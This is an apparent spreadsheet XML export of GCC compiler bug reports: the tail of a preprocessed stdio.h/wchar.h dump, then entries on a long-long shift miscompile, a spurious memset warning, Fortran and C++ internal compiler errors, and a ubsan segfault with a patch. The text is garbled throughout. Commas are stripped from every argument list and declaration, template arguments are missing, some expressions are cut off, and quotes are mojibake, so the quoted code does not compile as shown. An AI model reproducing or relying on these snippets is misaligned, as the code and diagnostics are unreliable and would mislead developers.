extern __off64_t _IO_seekpos (_IO_FILE * __off64_t int) throw ()
extern void _IO_free_backup_area (_IO_FILE *) throw ()
}
# 58 /usr/include/stdio.h 2 3
typedef __off_t fpos_t
typedef __off64_t fpos64_t
# 110 /usr/include/stdio.h 3
# 1 /usr/include/bits/stdio_lim.h 1 3
# 111 /usr/include/stdio.h 2 3
extern FILE *stdin
extern FILE *stdout
extern FILE *stderr
extern int remove (__const char *__filename) throw ()
extern int rename (__const char *__old __const char *__new) throw ()
extern FILE *tmpfile (void) throw ()
# 140 /usr/include/stdio.h 3
extern FILE *tmpfile64 (void) throw ()
extern char *tmpnam (char *__s) throw ()
extern char *tmpnam_r (char *__s) throw ()
# 160 /usr/include/stdio.h 3
extern char *tempnam (__const char *__dir __const char *__pfx) throw ()
extern int fclose (FILE *__stream) throw ()
extern int fflush (FILE *__stream) throw ()
extern int fflush_unlocked (FILE *__stream) throw ()
extern int fcloseall (void) throw ()
extern FILE *fopen (__const char *__restrict __filename __const char *__restrict __modes) throw ()
extern FILE *freopen (__const char *__restrict __filename __const char *__restrict __modes FILE *__restrict __stream) throw ()
# 203 /usr/include/stdio.h 3
extern FILE *fopen64 (__const char *__restrict __filename __const char *__restrict __modes) throw ()
extern FILE *freopen64 (__const char *__restrict __filename __const char *__restrict __modes FILE *__restrict __stream) throw ()
extern FILE *fdopen (int __fd __const char *__modes) throw ()
extern FILE *fopencookie (void *__restrict __magic_cookie __const char *__restrict __modes _IO_cookie_io_functions_t __io_funcs) throw ()
extern FILE *open_memstream (char **__restrict __bufloc size_t *__restrict __sizeloc) throw ()
extern void setbuf (FILE *__restrict __stream char *__restrict __buf) throw ()
extern int setvbuf (FILE *__restrict __stream char *__restrict __buf int __modes size_t __n) throw ()
extern void setbuffer (FILE *__restrict __stream char *__restrict __buf size_t __size) throw ()
extern void setlinebuf (FILE *__stream) throw ()
extern int fprintf (FILE *__restrict __stream __const char *__restrict __format ...) throw ()
extern int printf (__const char *__restrict __format ...) throw ()
extern int sprintf (char *__restrict __s __const char *__restrict __format ...) throw ()
extern int vfprintf (FILE *__restrict __s __const char *__restrict __format __gnuc_va_list __arg) throw ()
extern int vprintf (__const char *__restrict __format __gnuc_va_list __arg) throw ()
extern int vsprintf (char *__restrict __s __const char *__restrict __format __gnuc_va_list __arg) throw ()
extern int snprintf (char *__restrict __s size_t __maxlen __const char *__restrict __format ...) throw ()
     __attribute__ ((__format__ (__printf__ 3 4)))
extern int __vsnprintf (char *__restrict __s size_t __maxlen __const char *__restrict __format __gnuc_va_list __arg) throw ()
     __attribute__ ((__format__ (__printf__ 3 0)))
extern int vsnprintf (char *__restrict __s size_t __maxlen __const char *__restrict __format __gnuc_va_list __arg) throw ()
     __attribute__ ((__format__ (__printf__ 3 0)))
extern int vasprintf (char **__restrict __ptr __const char *__restrict __f __gnuc_va_list __arg) throw ()
     __attribute__ ((__format__ (__printf__ 2 0)))
extern int __asprintf (char **__restrict __ptr __const char *__restrict __fmt ...) throw ()
     __attribute__ ((__format__ (__printf__ 2 3)))
extern int asprintf (char **__restrict __ptr __const char *__restrict __fmt ...) throw ()
     __attribute__ ((__format__ (__printf__ 2 3)))
extern int vdprintf (int __fd __const char *__restrict __fmt __gnuc_va_list __arg) throw ()
     __attribute__ ((__format__ (__printf__ 2 0)))
extern int dprintf (int __fd __const char *__restrict __fmt ...) throw ()
     __attribute__ ((__format__ (__printf__ 2 3)))
extern int fscanf (FILE *__restrict __stream __const char *__restrict __format ...) throw ()
extern int scanf (__const char *__restrict __format ...) throw ()
extern int sscanf (__const char *__restrict __s __const char *__restrict __format ...) throw ()
extern int vfscanf (FILE *__restrict __s __const char *__restrict __format __gnuc_va_list __arg) throw ()
     __attribute__ ((__format__ (__scanf__ 2 0)))
extern int vscanf (__const char *__restrict __format __gnuc_va_list __arg) throw ()
     __attribute__ ((__format__ (__scanf__ 1 0)))
extern int vsscanf (__const char *__restrict __s __const char *__restrict __format __gnuc_va_list __arg) throw ()
     __attribute__ ((__format__ (__scanf__ 2 0)))
extern int fgetc (FILE *__stream) throw ()
extern int getc (FILE *__stream) throw ()
extern int getchar (void) throw ()
extern int getc_unlocked (FILE *__stream) throw ()
extern int getchar_unlocked (void) throw ()
extern int fgetc_unlocked (FILE *__stream) throw ()
extern int fputc (int __c FILE *__stream) throw ()
extern int putc (int __c FILE *__stream) throw ()
extern int putchar (int __c) throw ()
extern int fputc_unlocked (int __c FILE *__stream) throw ()
extern int putc_unlocked (int __c FILE *__stream) throw ()
extern int putchar_unlocked (int __c) throw ()
extern int getw (FILE *__stream) throw ()
extern int putw (int __w FILE *__stream) throw ()
extern char *fgets (char *__restrict __s int __n FILE *__restrict __stream) throw ()
extern char *fgets_unlocked (char *__restrict __s int __n FILE *__restrict __stream) throw ()
extern char *gets (char *__s) throw ()
# 413 /usr/include/stdio.h 3
extern __ssize_t __getdelim (char **__restrict __lineptr size_t *__restrict __n int __delimiter FILE *__restrict __stream) throw ()
extern __ssize_t getdelim (char **__restrict __lineptr size_t *__restrict __n int __delimiter FILE *__restrict __stream) throw ()
extern __ssize_t getline (char **__restrict __lineptr size_t *__restrict __n FILE *__restrict __stream) throw ()
extern int fputs (__const char *__restrict __s FILE *__restrict __stream) throw ()
extern int fputs_unlocked (__const char *__restrict __s FILE *__restrict __stream) throw ()
extern int puts (__const char *__s) throw ()
extern int ungetc (int __c FILE *__stream) throw ()
extern size_t fread (void *__restrict __ptr size_t __size size_t __n FILE *__restrict __stream) throw ()
extern size_t fwrite (__const void *__restrict __ptr size_t __size size_t __n FILE *__restrict __s) throw ()
extern size_t fread_unlocked (void *__restrict __ptr size_t __size size_t __n FILE *__restrict __stream) throw ()
extern size_t fwrite_unlocked (__const void *__restrict __ptr size_t __size size_t __n FILE *__restrict __stream) throw ()
extern int fseek (FILE *__stream long int __off int __whence) throw ()
extern long int ftell (FILE *__stream) throw ()
extern void rewind (FILE *__stream) throw ()
# 477 /usr/include/stdio.h 3
typedef __off_t off_t
typedef __off64_t off64_t
extern int fseeko (FILE *__stream __off_t __off int __whence) throw ()
extern __off_t ftello (FILE *__stream) throw ()
extern int fgetpos (FILE *__restrict __stream fpos_t *__restrict __pos) throw ()
extern int fsetpos (FILE *__stream __const fpos_t *__pos) throw ()
# 527 /usr/include/stdio.h 3
extern int fseeko64 (FILE *__stream __off64_t __off int __whence) throw ()
extern __off64_t ftello64 (FILE *__stream) throw ()
extern int fgetpos64 (FILE *__restrict __stream fpos64_t *__restrict __pos) throw ()
extern int fsetpos64 (FILE *__stream __const fpos64_t *__pos) throw ()
extern void clearerr (FILE *__stream) throw ()
extern int feof (FILE *__stream) throw ()
extern int ferror (FILE *__stream) throw ()
extern void clearerr_unlocked (FILE *__stream) throw ()
extern int feof_unlocked (FILE *__stream) throw ()
extern int ferror_unlocked (FILE *__stream) throw ()
extern void perror (__const char *__s) throw ()
extern int sys_nerr
extern __const char *__const sys_errlist[]
extern int _sys_nerr
extern __const char *__const _sys_errlist[]
extern int fileno (FILE *__stream) throw ()
extern int fileno_unlocked (FILE *__stream) throw ()
extern FILE *popen (__const char *__command __const char *__modes) throw ()
extern int pclose (FILE *__stream) throw ()
extern char *ctermid (char *__s) throw ()
extern char *cuserid (char *__s) throw ()
struct obstack
extern int obstack_printf (struct obstack *__restrict __obstack __const char *__restrict __format ...) throw ()
extern int obstack_vprintf (struct obstack *__restrict __obstack __const char *__restrict __format __gnuc_va_list __args) throw ()
# 614 /usr/include/stdio.h 3
extern void flockfile (FILE *__stream) throw ()
extern int ftrylockfile (FILE *__stream) throw ()
extern void funlockfile (FILE *__stream) throw ()
# 635 /usr/include/stdio.h 3
# 1 /usr/include/bits/stdio.h 1 3
# 32 /usr/include/bits/stdio.h 3
inline int
vprintf (__const char *__restrict __fmt __gnuc_va_list __arg) throw ()
{
  return vfprintf (stdout __fmt __arg)
}
inline int
getchar (void) throw ()
{
  return _IO_getc (stdin)
}
inline int
getc_unlocked (FILE *__fp) throw ()
{
  return ((__fp)-&gt;_IO_read_ptr &gt;= (__fp)-&gt;_IO_read_end ? __uflow (__fp) : *(unsigned char *) (__fp)-&gt;_IO_read_ptr++)
}
inline int
getchar_unlocked (void) throw ()
{
  return ((stdin)-&gt;_IO_read_ptr &gt;= (stdin)-&gt;_IO_read_end ? __uflow (stdin) : *(unsigned char *) (stdin)-&gt;_IO_read_ptr++)
}
inline int
putchar (int __c) throw ()
{
  return _IO_putc (__c stdout)
}
inline int
fputc_unlocked (int __c FILE *__stream) throw ()
{
  return (((__stream)-&gt;_IO_write_ptr &gt;= (__stream)-&gt;_IO_write_end) ? __overflow (__stream (unsigned char) (__c)) : (unsigned char) (*(__stream)-&gt;_IO_write_ptr++ = (__c)))
}
inline int
putc_unlocked (int __c FILE *__stream) throw ()
{
  return (((__stream)-&gt;_IO_write_ptr &gt;= (__stream)-&gt;_IO_write_end) ? __overflow (__stream (unsigned char) (__c)) : (unsigned char) (*(__stream)-&gt;_IO_write_ptr++ = (__c)))
}
inline int
putchar_unlocked (int __c) throw ()
{
  return (((stdout)-&gt;_IO_write_ptr &gt;= (stdout)-&gt;_IO_write_end) ? __overflow (stdout (unsigned char) (__c)) : (unsigned char) (*(stdout)-&gt;_IO_write_ptr++ = (__c)))
}
inline __ssize_t
getline (char **__lineptr size_t *__n FILE *__stream) throw ()
{
  return __getdelim (__lineptr __n '\n' __stream)
}
inline int
feof_unlocked (FILE *__stream) throw ()
{
  return (((__stream)-&gt;_flags 
}
inline int
ferror_unlocked (FILE *__stream) throw ()
{
  return (((__stream)-&gt;_flags 
}
# 636 /usr/include/stdio.h 2 3
}
# 45 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdio.h 2 3
# 94 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdio.h 3
namespace std
{
  using ::FILE
  using ::fpos_t
  extern C int remove(const char*)
  extern C int rename(const char* const char*)
  extern C FILE* tmpfile(void)
  extern C char* tmpnam(char*)
  extern C int fclose(FILE*)
  extern C int fflush(FILE*)
  extern C FILE* fopen(const char* const char*)
  extern C FILE* freopen(const char* const char* FILE*)
  extern C void setbuf(FILE* char*)
  extern C int setvbuf(FILE* char* int size_t)
  extern C int fprintf(FILE* const char* ...)
  extern C int fscanf(FILE* const char* ...)
  extern C int printf(const char* ...)
  extern C int scanf(const char* ...)
  extern C int snprintf(char * size_t const char* ...)
  extern C int sprintf(char * const char* ...)
  extern C int sscanf(const char* const char* ...)
  extern C int vfprintf(FILE* const char* va_list)
  extern C int vfscanf(FILE* const char* va_list)
  extern C int vprintf(const char* va_list)
  extern C int vscanf(const char* va_list)
  extern C int vsnprintf(char* size_t const char* va_list)
  extern C int vsprintf(char* const char* va_list)
  extern C int vsscanf(const char* const char* va_list)
  extern C int fgetc(FILE *)
  extern C char *fgets(char* int FILE*)
  extern C int fputc(int FILE*)
  extern C int fputs(const char* FILE*)
  extern C int getc(FILE*)
  extern C int getchar(void)
  extern C char *gets(char*)
  extern C int putc(int FILE*)
  extern C int putchar(int)
  extern C int puts(const char*)
  extern C int ungetc(int FILE*)
  extern C size_t fread(void* size_t size_t FILE*)
  extern C size_t fwrite(const void* size_t size_t FILE*)
  extern C int fgetpos(FILE* fpos_t*)
  extern C int fseek(FILE* long int int)
  extern C int fsetpos(FILE* const fpos_t*)
  extern C long int ftell(FILE*)
  extern C void rewind(FILE*)
  extern C void clearerr(FILE*)
  extern C int feof(FILE*)
  extern C int ferror(FILE*)
  extern C void perror(const char*)
}
# 42 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cwchar.h 2 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cstdarg.h 1 3
# 43 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cwchar.h 2 3
# 46 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include-g++/bits/std_cwchar.h 3
# 1 /usr/include/wchar.h 1 3
# 27 /usr/include/wchar.h 3
# 1 /usr/include/features.h 1 3
# 28 /usr/include/wchar.h 2 3
# 1 /usr/include/stdio.h 1 3
# 32 /usr/include/wchar.h 2 3
# 1 /public/packages/programming/gcc-current/lib/gcc-lib/i686-pc-linux-gnu/3.0/include/stddef.h 1 3
# 39 /usr/include/wchar.h 2 3
# 53 /usr/include/wchar.h 3
typedef struct
{
  int count
  wint_t value
} mbstate_t
# 77 /usr/include/wchar.h 3
struct tm
extern C {
extern wchar_t *wcscpy (wchar_t *__restrict __dest __const wchar_t *__restrict __src) throw ()
extern wchar_t *wcsncpy (wchar_t *__restrict __dest __const wchar_t *__restrict __src size_t __n) throw ()
extern wchar_t *wcscat (wchar_t *__restrict __dest __const wchar_t *__restrict __src) throw ()
extern wchar_t *wcsncat (wchar_t *__restrict __dest __const wchar_t *__restrict __src size_t __n) throw ()
extern int wcscmp (__const wchar_t *__s1 __const wchar_t *__s2) throw ()
extern int wcsncmp (__const wchar_t *__s1 __const wchar_t *__s2 size_t __n) throw ()
extern int wcscasecmp (__const wchar_t *__s1 __const wchar_t *__s2) throw ()
extern int wcsncasecmp (__const wchar_t *__s1 __const wchar_t *__s2 size_t __n) throw ()
# 1 /usr/include/xlocale.h 1 3
# 28 /usr/include/xlocale.h 3
typedef struct __locale_struct
{
  struct locale_data *__locales[6]
  const unsigned short int *__ctype_b
  const int *__ctype_tolower
  const int *__ctype_toupper
} *__locale_t
# 113 /usr/include/wchar.h 2 3
extern int __wcscasecmp_l (__const wchar_t *__s1 __const wchar_t *__s2 __locale_t __loc) throw ()
extern int __wcsncasecmp_l (__const wchar_t *__s1 __const wchar_t *__s2 size_t __n __locale_t __loc) throw ()
extern int wcscoll (__const wchar_t *__s1 __const wchar_t *__s2) throw ()
extern size_t wcsxfrm (wchar_t *__restrict __s1 __const wchar_t *__restrict __s2 size_t __n) throw ()
# 136 /usr/include/wchar.h 3
extern int __wcscoll_l (__const wchar_t *__s1 __const wchar_t *__s2 __locale_t __loc) throw ()
extern size_t __wcsxfrm_l (wchar_t *__s1 __const wchar_t *__s2 size_t __n __locale_t __loc) throw ()
extern wchar_t *wcsdup (__const wchar_t *__s) throw ()
extern wchar_t *wcschr (__const wchar_t *__wcs wchar_t __wc) throw ()
extern wchar_t *wcsrchr (__const wchar_t *__wcs wchar_t __wc) throw ()
extern size_t wcscspn (__const wchar_t *__wcs __const wchar_t *__reject) throw ()
extern size_t wcsspn (__const wchar_t *__wcs __const wchar_t *__accept) throw ()
extern wchar_t *wcspbrk (__const wchar_t *__wcs __const wchar_t *__accept) throw ()
extern wchar_t *wcsstr (__const wchar_t *__haystack __const wchar_t *__needle) throw ()
# 174 /usr/include/wchar.h 3
extern wchar_t *wcstok (wchar_t *__restrict __s __const wchar_t *__restrict __delim wchar_t **__restrict __ptr) throw ()
extern size_t __wcslen (__const wchar_t *__s) throw ()
extern size_t wcslen (__const wchar_t *__s) throw ()
extern size_t wcsnlen (__const wchar_t *__s size_t __maxlen) throw ()
extern wchar_t *wmemchr (__const wchar_t *__s wchar_t __c size_t __n) throw ()
extern int wmemcmp (__const wchar_t *__restrict __s1 __const wchar_t *__restrict __s2 size_t __n) throw ()
extern wchar_t *wmemcpy (wchar_t *__restrict __s1 __const wchar_t *__restrict __s2 size_t __n) throw ()
extern wchar_t *wmemmove (wchar_t *__s1 __const wchar_t *__s2 size_t __n) throw ()
extern wchar_t *wmemset (wchar_t *__s wchar_t __c size_t __n) throw ()
extern wint_t btowc (int __c) throw ()
extern int wctob (wint_t __c) throw ()
extern int mbsinit (__const mbstate_t *__ps) throw ()
extern size_t mbrtowc (wchar_t *__restrict __pwc __const char *__restrict __s size_t __n mbstate_t *__p) throw ()
extern size_t wcrtomb (char *__restrict __s wchar_t __wc mbstate_t *__restrict __ps) throw ()
extern size_t __mbrlen (__const char *__restrict __s size_t __n mbstate_t *__restrict __ps) throw ()
extern size_t mbrlen (__const char *__restrict __s size_t __n mbstate_t *__restrict __ps) throw ()
extern __inline size_t mbrlen (__const char *__restrict __s size_t __n
                               mbstate_t *__restrict __ps) throw ()
{ return (__ps != __null
          ? mbrtowc (__null __s __n __ps) : __mbrlen (__s __n __null)) }
extern size_t mbsrtowcs (wchar_t *__restrict __dst __const char **__restrict __src size_t __len mbstate_t *__restrict __ps) throw ()
extern size_t wcsrtombs (char *__restrict __dst __const wchar_t **__restrict __src size_t __len mbstate_t *__restrict __ps) throw ()
extern size_t mbsnrtowcs (wchar_t *__restrict __dst __const char **__restrict __src size_t __nmc size_t __len mbstate_t *__restrict __ps) throw ()
extern size_t wcsnrtombs (char *__restrict __dst __const wchar_t **__restrict __src size_t __nwc size_t __len mbstate_t *__restrict __ps) throw ()
# 277 /usr/include/wchar.h 3
extern int wcwidth (wint_t __c) throw ()
extern int wcswidth (__const wchar_t *__s size_t __n) throw ()
extern double wcstod (__const</t>
  </si>
  <si>
    <t>zeller</t>
  </si>
  <si>
    <t>GCC-40057</t>
  </si>
  <si>
    <t>Incorrect right shift by 31 with long long</t>
  </si>
  <si>
    <t>The following code compiled with GCC 4.4 and -O1 produces a wrong result for the SHIFT and AND operation. Bit 31 of the variable 'var' in fucntion shiftTest computes to '1' instead of a '0'.
Compiling with -O0 however produces the right result.
#include stdio.h
typedef unsigned long long ulonglong
int shiftTest (const ulonglong var)
{
  ulonglong predicate = (var &gt;&gt; 31ULL) 
  if (predicate == 0ULL)
    {
      return 0
    }
  return -1
}
int main (void)
{
  ulonglong var = 0x1682a9aaaULL
  printf (Bit 31 of 0x%llx is %llu\n var (var &gt;&gt; 31ULL) 
  int result = shiftTest (var)
  if (result == 0)
    {
      printf (Bit 31 is 0 - Correct!\n)
    }
  else
    {
      printf (Bit 31 is 1 - Incorrect!\n)
    }
  return 0
}</t>
  </si>
  <si>
    <t>rkharche</t>
  </si>
  <si>
    <t>GCC-51744</t>
  </si>
  <si>
    <t>Erroneous warning: memset used with constant zero length parameter</t>
  </si>
  <si>
    <t>Created attachment 26233
concatated ma2.i and ma2_test.i from -save-temps ma2.c and ma2_test.c
Attached code gives erroneous warning when compiled with -
gcc -O3 -flto -Wall -Wextra -D_FORTIFY_SOURCE=2 -c ma2.c
gcc -O3 -flto -Wall -Wextra -D_FORTIFY_SOURCE=2 -c ma2_test.c
gcc -O3 -flto -Wall -Wextra -D_FORTIFY_SOURCE=2 -o ma2_test ma2_test.o ma2.o
ma2.o (symbol from plugin): warning: memset used with constant zero length parameter this could be due to transposed parameters
Compiling without -flto or without -D_FORTIFY_SOURCE=2 does not give warning.
Generated code seems to work ok anyway.</t>
  </si>
  <si>
    <t>GCC-78500</t>
  </si>
  <si>
    <t>ICE in gfc_check_vardef_context at fortran/expr.c:5289</t>
  </si>
  <si>
    <t>With invalid code down to at least 4.8 :
(configured with --enable-checking=yes)
$ cat z1.f90
class(t) function f()
   f = 1
end
$ gfortran-7-20161120 -c z1.f90
z1.f90:1:0:
 class(t) function f()
Error: CLASS variable 'f' at (1) must be dummy allocatable or pointer
f951: internal compiler error: Segmentation fault
0xc4265f crash_signal
        ../../gcc/toplev.c:333
0x69642c gfc_check_vardef_context(gfc_expr* bool bool bool char const*)
        ../../gcc/fortran/expr.c:5289
0x6f81e6 gfc_resolve_code(gfc_code* gfc_namespace*)
        ../../gcc/fortran/resolve.c:10915
0x6fab92 resolve_codes
        ../../gcc/fortran/resolve.c:16025
0x6fac8e gfc_resolve(gfc_namespace*)
        ../../gcc/fortran/resolve.c:16060
0x6e520a resolve_all_program_units
        ../../gcc/fortran/parse.c:5977
0x6e520a gfc_parse_file()
        ../../gcc/fortran/parse.c:6224
0x729052 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:202</t>
  </si>
  <si>
    <t>GCC-67164</t>
  </si>
  <si>
    <t>ICE: tree check: expected class â€˜expressionâ€™ have â€˜exceptionalâ€™ (argument_pack_select) in tree_operand_check at tree.h:3356</t>
  </si>
  <si>
    <t>% cat github_113.ii
namespace std {
template  struct integral_constant {
  static constexpr _Tp value = 0
}
template  struct conditional
template  struct __or_
template 
struct __or_ : conditional {}
template  struct __and_
template 
struct __and_ : conditional {}
template  struct is_rvalue_reference
template 
struct is_reference
    : __or_ is_rvalue_reference&gt;::type {}
template  _Tp declval()
struct __do_is_direct_constructible_impl {
  template &lt;typename _Tp typename _Arg
            typename = decltype(_Tp(declval()))&gt;
  static integral_constant __test(int)
}
template 
struct __is_direct_constructible_impl : __do_is_direct_constructible_impl {
  decltype(__test(0)) type
}
template 
struct __is_direct_constructible_new_safe
    : __and_&gt; {}
template 
struct __is_direct_constructible_new
    : conditional::value int
                  __is_direct_constructible_new_safe&gt; {}
template 
struct __is_direct_constructible
    : __is_direct_constructible_new::type {}
template  struct __is_nary_constructible
template 
struct __is_nary_constructible
    : __is_direct_constructible {}
template 
struct is_constructible : __is_nary_constructible::type {}
template  struct enable_if
template  struct conditional {
  typedef _Iftrue type
}
template 
struct conditional {
  typedef _Iffalse type
}
}
namespace boost {
namespace hana {
template  struct fast_and
template  struct closure {
  template &lt;typename... Yn
            typename = std::enable_if&lt;
                fast_and::value...&gt;::value&gt;&gt;
  closure(Yn...)
  template &lt;typename... Yn
            typename std::enable_if&lt;
                fast_and::value...&gt;::value&gt;::type&gt;
  closure(closure)
}
template  struct make_impl
template  struct make_t {
  template  decltype(auto) operator()(X... x) {
    return make_impl::apply(x...)
  }
}
template  make_t make
struct Pair
auto make_pair = make
struct Tuple
auto make_tuple = make
template  struct make_impl {
  template  static closure apply(Xs 
}
struct pair : closure {
  using closure::closure
}
template  struct make_impl {
  template  static pair apply(F S)
}
namespace struct_detail {
template  struct member_ptr {}
template  auto prepare_member_name_impl() {}
template  auto prepare_member_name() {
  return prepare_member_name_impl
}
}
}
}
struct Person {
  int Person
  auto apply() {
    struct member_names
    boost::hana::make_tuple(boost::hana::make_pair(
        boost::hana::struct_detail::prepare_member_name()
        boost::hana::struct_detail::member_ptr&lt;decltype(&amp;Person::Person)
  }
}
 % clang++ -std=c++14 -c github_113.ii
 %
(gcc-5 rejects the testcase)
 % g++ -std=c++14 -c github_113.ii
github_113.ii: In instantiation of â€˜struct std::__is_direct_constructible_impl&amp;&amp;&gt;â€™:
github_113.ii:41:8:   required from â€˜struct std::is_constructible&amp;&amp;&gt;â€™
github_113.ii:56:13:   required by substitution of â€˜template boost::hana::closure::closure(Yn ...) [with Yn = boost::hana::closure&lt;boost::hana::pair&amp;
&gt;  = ]â€™
github_113.ii:67:43:   required from â€˜decltype(auto) boost::hana::make_t::operator()(X ...) [with X = {boost::hana::pair} Datatype = boost::hana::Tuple]â€™
github_113.ii:100:67:   required from here
github_113.ii:24:29: error: no matching function for call to â€˜std::__is_direct_constructible_impl&amp;&amp;&gt;::__test(int)
â€™
   decltype(__test(0)) type
                             ^
github_113.ii:20:34: note: candidate: template static std::integral_constant std::__do_is_direct_constructible_impl::__test(int)
   static integral_constant __test(int)
                                  ^
github_113.ii:20:34: note:   template argument deduction/substitution failed:
github_113.ii:19:13: error: invalid cast of an rvalue expression of type â€˜boost::hana::closureâ€™ to type â€˜boost::hana::pair&amp;â€™
             typename = decltype(_Tp(declval()))&gt;
             ^
(trunk ICEs since r214396)
 % g++ -c github_113.ii
github_113.ii: In substitution of â€˜template::value ...&gt;::value&gt;::type  &gt; boost::hana::pair::pair(boost::hana::closure) [with Yn =  typename std::enable_if::value ...&gt;::value&gt;::type  = ]â€™:
github_113.ii:19:13:   required by substitution of â€˜template static std::integral_constant std::__do_is_direct_constructible_impl::__test(int) [with _Tp = boost::hana::pair _Arg = boost::hana::closure = ]â€™
github_113.ii:24:29:   required from â€˜struct std::__is_direct_constructible_impl&amp;&amp;&gt;â€™
github_113.ii:41:8:   required from â€˜struct std::is_constructible&amp;&amp;&gt;â€™
github_113.ii:56:13:   required by substitution of â€˜template boost::hana::closure::closure(Yn ...) [with Yn = boost::hana::closure = ]â€™
github_113.ii:67:43:   required from â€˜decltype(auto) boost::hana::make_t::operator()(X ...) [with X = {boost::hana::pair} Datatype = boost::hana::Tuple]â€™
github_113.ii:100:67:   required from here
github_113.ii:19:13: internal compiler error: tree check: expected class â€˜expressionâ€™ have â€˜exceptionalâ€™ (argument_pack_select) in tree_operand_check at tree.h:3356
             typename = decltype(_Tp(declval()))&gt;
             ^
0x10d3fcb7 tree_class_check_failed(tree_node const* tree_code_class char const* int char const*)
        ../../gcc/gcc/tree.c:9550
0x101160e3 expr_check
        ../../gcc/gcc/tree.h:3027
0x101160e3 tree_operand_check
        ../../gcc/gcc/tree.h:3356
0x102387cb tree_operand_check
        ../../gcc/gcc/tree.h:2972
0x102387cb unify
        ../../gcc/gcc/cp/pt.c:19046
0x102360ab unify
        ../../gcc/gcc/cp/pt.c:19096
0x101167b3 try_class_unification
        ../../gcc/gcc/cp/pt.c:18100
0x102356db unify
        ../../gcc/gcc/cp/pt.c:19134
0x1023a96f unify_one_argument
        ../../gcc/gcc/cp/pt.c:17450
0x10230277 type_unification_real
        ../../gcc/gcc/cp/pt.c:17522
0x10241453 fn_type_unification(tree_node* tree_node* tree_node* tree_node* const* unsigned int tree_node* unification_kind_t int bool bool)
        ../../gcc/gcc/cp/pt.c:16969
0x1018b31b add_template_candidate_real
        ../../gcc/gcc/cp/call.c:3054
0x1018bf4f add_template_candidate
        ../../gcc/gcc/cp/call.c:3151
0x1018bf4f add_candidates
        ../../gcc/gcc/cp/call.c:5307
0x101875d3 build_user_type_conversion_1
        ../../gcc/gcc/cp/call.c:3662
0x10187ffb implicit_conversion
        ../../gcc/gcc/cp/call.c:1853
0x1018981b reference_binding
        ../../gcc/gcc/cp/call.c:1701
0x10187e27 implicit_conversion
        ../../gcc/gcc/cp/call.c:1792
0x10191aef perform_direct_initialization_if_possible(tree_node* tree_node* bool int)
        ../../gcc/gcc/cp/call.c:9570
0x10342c73 build_static_cast_1
        ../../gcc/gcc/cp/typeck.c:6631
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-80414</t>
  </si>
  <si>
    <t>[UBSAN] segfault with -fsanitize=undefined</t>
  </si>
  <si>
    <t>Created attachment 41191
patch
Hello everyone.
I got segfault on 32 bit host with -fsanitize=undefined
My test case:
# cat test.c 
int main()
{
  long long offset = 10
  char array[10]
  char c = array[offset]
  return 0
}
# gcc -o test test.c -fsanitize=undefined -static-libubsan
# ./test
That happens while checking for bounds-strict option on 32 bit host.
As i can see gcc push value of the index to the stack before call 
__ubsan_handle_out_of_bounds
 67         subl    $44 %esp
 68         movl    $10 -32(%ebp)
 69         movl    $0 -28(%ebp)
 70         movl    -32(%ebp) %ebx
 71         movl    -28(%ebp) %esi
 72         movl    %ebx %eax
 73         cmpl    $9 %eax
 74         jbe     .L2
 75         subl    $8 %esp
 76         pushl   %eax
 77         pushl   $.Lubsan_data0
 78         call    __ubsan_handle_out_of_bounds
instead clang push address of that index
 15         movl    $10 -32(%ebp)
 16         movl    -28(%ebp) %eax
 17         movl    -32(%ebp) %ecx
 18         movl    %ecx %edx
 19         cmpl    $10 %edx
 20         movl    %eax -44(%ebp)         # 4-byte Spill
 21         movl    %ecx -48(%ebp)         # 4-byte Spill
 22         jb      .LBB0_2
 23 # BB#1:
 24         leal    .L__unnamed_1 %eax
 25         leal    -40(%ebp) %ecx
 26         movl    -48(%ebp) %edx         # 4-byte Reload
 27         movl    %edx -40(%ebp)
 28         movl    -44(%ebp) %esi         # 4-byte Reload
 29         movl    %esi -36(%ebp)
 30         movl    %eax (%esp)
 31         movl    %ecx 4(%esp)
 32         calll   __ubsan_handle_out_of_bounds
In this case fix should be in IR generation for
__ubsan_handle_out_of_bounds.
Looks like tree val should be generated from original tree 
index and not from tree index which 
were converted to bound type.
diff --git a/gcc/ubsan.c b/gcc/ubsan.c
index 17965ef..c56f376 100644
--- a/gcc/ubsan.c
+++ b/gcc/ubsan.c
@@ -6727 +6728 @@ ubsan_expand_bounds_ifn (gimple_stmt_iterator *gsi)
   /* Pick up the arguments of the UBSAN_BOUNDS call.  */
   tree type = TREE_TYPE (TREE_TYPE (gimple_call_arg (stmt 0)))
-  tree index = gimple_call_arg (stmt 1)
+  tree index orig_index
+  index = orig_index = gimple_call_arg (stmt 1)
   tree orig_index_type = TREE_TYPE (index)
   tree bound = gimple_call_arg (stmt 2)
@@ -7089 +7099 @@ ubsan_expand_bounds_ifn (gimple_stmt_iterator *gsi)
          ? BUILT_IN_UBSAN_HANDLE_OUT_OF_BOUNDS
          : BUILT_IN_UBSAN_HANDLE_OUT_OF_BOUNDS_ABORT
       tree fn = builtin_decl_explicit (bcode)
-      tree val = force_gimple_operand_gsi (gsi ubsan_encode_value (index)
-                                          true NULL_TREE true
-                                          GSI_SAME_STMT)
+      tree val
+       = force_gimple_operand_gsi (gsi ubsan_encode_value (orig_index) true
+                                   NULL_TREE true GSI_SAME_STMT)
       g = gimple_build_call (fn 2 data val)
     }
   gimple_set_location (g loc)
I attached patch.
Tests with make check RUNTESTFLAGS=ubsan.exp passed for x86 32bit 
and 64 bit host.</t>
  </si>
  <si>
    <t>dennis.khalikov</t>
  </si>
  <si>
    <t>GCC-5962</t>
  </si>
  <si>
    <t>g++ compile an link</t>
  </si>
  <si>
    <t>when I try to compile the code that use template and friend 
function  the link show-me a message 
 g++ -o tcomplex tComplex.cc
tComplex.cc:15: warning: friend declaration `bool operator==(const Complex&amp;
   const Complex&amp;)' declares a non-template function
tComplex.cc:15: warning: (if this is not what you intended make sure the
   function template has already been declared and add  after the function
